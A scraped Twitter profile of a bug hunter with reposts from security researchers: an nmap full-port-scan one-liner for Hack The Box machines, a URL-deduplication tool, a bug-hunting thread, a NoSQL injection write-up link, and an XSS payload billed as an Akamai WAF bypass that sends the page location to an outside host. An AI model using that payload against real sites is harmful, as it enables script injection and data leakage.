mitul patel (@a9hora) 's Twitter Profile
mitul patel

@a9hora

A bug hunter, eCPPT, CEH, Cybersecurity Engineer, Computer Enthusiast.

ID: 824576262605860866

calendar_today26-01-2017 11:14:35

181 Tweet

172 Followers

543 Following

Kathan Patel (@kathanp19) 's Twitter Profile Photo

Mostly used on htb machines for a complete port scan!! ports=$(nmap -p- --min-rate=1000 -T4 {Target_IP} | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports -sT {Target_IP}

Somdev Sangwan (@s0md3v) 's Twitter Profile Photo

I created a tool that removes boring/duplicate URLs from a URL list. "uro" understands our pain, check the demo below :) github.com/s0md3v/uro

I created a tool that removes boring/duplicate URLs from a URL list.

"uro" understands our pain, check the demo below :)

github.com/s0md3v/uro
XSS Payloads (@xsspayloads) 's Twitter Profile Photo

A payload to bypass Akamai WAF, by Stealthy "><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click

Rahul Bhichher (@rbhichher) 's Twitter Profile Photo

Why do we fail at bug hunting? Here is a simple thread of some core reasons that lead us to burnouts ✨ If you make a stronghold in them, you will stand out in the community.

Kuldeep Pandya (@kuldeepdotexe) 's Twitter Profile Photo

As promised, here is the blog about my recent finding which was a NoSQL injection on a Synack Red Team client: Let me know if you guys like it :) Feebacks are appreciated. kuldeep.io/posts/nosql-in…